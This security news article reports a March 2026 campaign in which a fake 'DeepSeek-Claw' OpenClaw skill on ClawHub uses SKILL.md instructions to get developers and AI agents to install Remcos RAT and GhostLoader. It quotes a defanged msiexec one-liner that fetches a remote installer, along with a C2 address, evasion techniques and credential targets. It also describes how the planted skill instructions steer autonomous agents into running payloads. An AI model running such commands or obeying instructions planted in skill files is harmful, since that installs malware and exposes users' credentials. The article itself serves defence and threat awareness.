Threat actors have weaponized the OpenClaw agentic AI framework by publishing a fake “DeepSeek-Claw” skill that silently installs Remcos RAT on Windows systems and deploys GhostLoader across macOS and Linux, targeting developers and autonomous AI pipelines with sophisticated multi-stage attack chains.
OpenClaw, previously known as Clawdbot, Moltbot, and Molty, is an open-source framework designed for autonomous AI agents that require high-privilege local system access to execute complex, multi-step tasks.
Its modular “skill” architecture, which allows third-party developers to publish reusable capabilities to a public marketplace called ClawHub, has become an increasingly attractive attack surface.
Between late February and late March 2026, attackers distributed 335 malicious skills via ClawHub, exploiting the framework’s trust model to deliver hidden payloads at scale.
In March 2026, Zscaler ThreatLabz identified a campaign that specifically exploited the growing enterprise adoption of agentic AI workflows.
The threat actor published a repository named “DeepSeek-Claw,” presenting it as a legitimate OpenClaw integration for the DeepSeek AI model.
Embedded within the repository’s SKILL.md instruction file were execution commands designed to trick both unsuspecting developers and autonomous AI agents into running malicious payloads without any additional user confirmation.
Dual Infection Chain
The attack branches into two distinct infection paths depending on the victim’s platform and execution method, both ultimately designed to achieve persistent access and data exfiltration.
Windows Path – Remcos RAT via DLL Sideloading: On Windows, the SKILL.md file instructs victims to run a PowerShell one-liner:
cmd /c start msiexec /q /i hxxps://cloudcraftshub[.]com/api & rem DeepSeek ClawThis silently downloads and executes a remote MSI package containing two files: G2M.exe, a legitimate, digitally signed GoToMeeting executable from LogMeIn, Inc., and a malicious g2m.dll that exploits DLL search-order hijacking.
When G2M.exe attempts to load its legitimate dependency, it instead loads the threat actor’s malicious DLL, allowing execution to blend seamlessly into trusted, signed processes and evade signature-based defenses.
Cross-Platform Path GhostLoader via Node.js: For macOS, Linux, and manual Windows workflows, the alternate instructions are in SKILL.md trigger a heavily obfuscated Node.js payload (setup.js) embedded in npm lifecycle scripts.
Once executed, GhostLoader, also tracked as GhostClaw, acts as a sophisticated dropper that employs terminal-based social engineering, including spoofed sudo password prompts, to harvest system credentials.
The malicious g2m.dll functions as an in-memory shellcode loader packed with multiple layers of anti-analysis, anti-debugging, and anti-virtualization protections.
To suppress security telemetry, it patches ntdll!EtwEventWrite in memory to immediately return, effectively blinding Event Tracing for Windows (ETW), and patches amsi!AmsiScanBuffer to return AMSI_RESULT_CLEAN, bypassing local memory scanners entirely.
Anti-debugging logic includes checking the Process Environment Block (PEB) for the BeingDebugged and NtGlobalFlag fields, measuring the elapsed time of a Sleep(100) call to detect sandbox time-acceleration (aborting if under ~90ms), and scanning its own executable memory page-by-page for the 0xCC INT 3 opcode to detect software breakpoints.
The loader also XOR-decrypts a blocklist of analysis tools at runtime and calls CreateToolhelp32Snapshot to hunt for processes such as ida64.exe, x64dbg.exe, wireshark.exe, and vmtoolsd.exe, terminating immediately if any are found.
The core Remcos payload is stored encrypted in the DLL’s data section using the Tiny Encryption Algorithm (TEA) in CBC mode with a 128-bit key.
Once decrypted and executed, Remcos establishes a TLS-encrypted command-and-control (C2) channel over TCP to 146[.]19.24[.]131:2404, enabling keylogging, clipboard capture, browser cookie theft from local SQLite databases to bypass MFA, and an interactive reverse shell for arbitrary command execution.
GhostLoader, documented independently by JFrog Security Research, is a large JavaScript malware bundle that functions simultaneously as an infostealer and a remote access trojan. It installs itself in a hidden directory disguised as .npm_telemetry, adds shell hooks to startup files, and on Linux creates a cron job for persistence across reboots.
The data collection scope is particularly severe for developer environments: GhostLoader harvests SSH keys, AWS credentials, Azure and GCP profiles, Kubernetes configs, Docker settings, Git credentials, GitHub CLI tokens, npm authentication data, Solana wallet keys, browser passwords, session cookies, autofill data, crypto wallet files and seed phrases, macOS Keychain databases, and iMessage history.
All exfiltrated data is transmitted to a threat actor-controlled server, and the persistent RAT component includes SOCKS5 proxy functionality and live browser session cloning.
MITRE ATT&CK Mapping
This campaign maps to multiple MITRE ATT&CK techniques, including T1195.002 (Supply Chain Compromise), T1204.002 (User Execution: Malicious File), T1574.002 (DLL Side-Loading), and T1562.001 (Impair Defenses: Disable or Modify Tools).
The attack’s most dangerous characteristic is its ability to weaponize autonomous AI agents themselves as unwitting executors, entirely bypassing the human review step that traditional social engineering attacks depend on.
Zscaler’s multilayered cloud security platform detects indicators at multiple levels under the threat names Win32.Backdoor.RemcosRat and Win32.Dropper.RemcosRat and its Cloud Sandbox provide behavioral detection of the MSI dropper. Red Canary also published threat-hunting guidance specifically targeting malicious OpenClaw skills in enterprise environments.
Mitigation
Organizations and developers using OpenClaw or similar agentic AI frameworks should take the following immediate steps:
- Audit all installed OpenClaw skills and remove any unverified or community-sourced integrations from production environments
- Enforce strict allow-listing policies on which skills AI agents are permitted to parse and execute autonomously
- Monitor for unusual MSI executions, DLL loads from application directories of signed executables, and unexpected PowerShell one-liners
- Block outbound connections to unknown MSI hosting domains and suspicious C2 infrastructure at the network perimeter.
- Implement behavioral monitoring using EDR tools for process injection, ETW patching, and AMSI bypass attempts in real time.
- Treat any AI agent skill repository with the same scrutiny applied to third-party code libraries before deployment.
FAQ
Q1: What is the OpenClaw “DeepSeek-Claw” attack?
It is a March 2026 campaign in which threat actors published a fake OpenClaw skill that tricks AI agents or developers into silently installing the Remcos RAT on Windows and GhostLoader on macOS/Linux via malicious SKILL.md instructions.
Q2: How does Remcos RAT evade detection in this attack?
It patches ETW and AMSI in memory, uses TEA-CBC payload encryption, performs anti-debugging PEB checks, detects time-based sandbox acceleration, and blocks 15+ analysis tools before execution.
Q3: What data does GhostLoader steal from developer environments?
GhostLoader harvests SSH keys, cloud credentials (AWS/Azure/GCP), Kubernetes configs, browser cookies, crypto wallet seeds, macOS Keychain data, iMessage history, and GitHub/npm tokens.
Q4: How can organizations protect against malicious OpenClaw skills?
Organizations should audit all third-party skills, enforce strict execution policies for AI agents, deploy behavioral EDR monitoring, and use Zscaler’s cloud security platform for sandbox-based threat detection.
About the Author
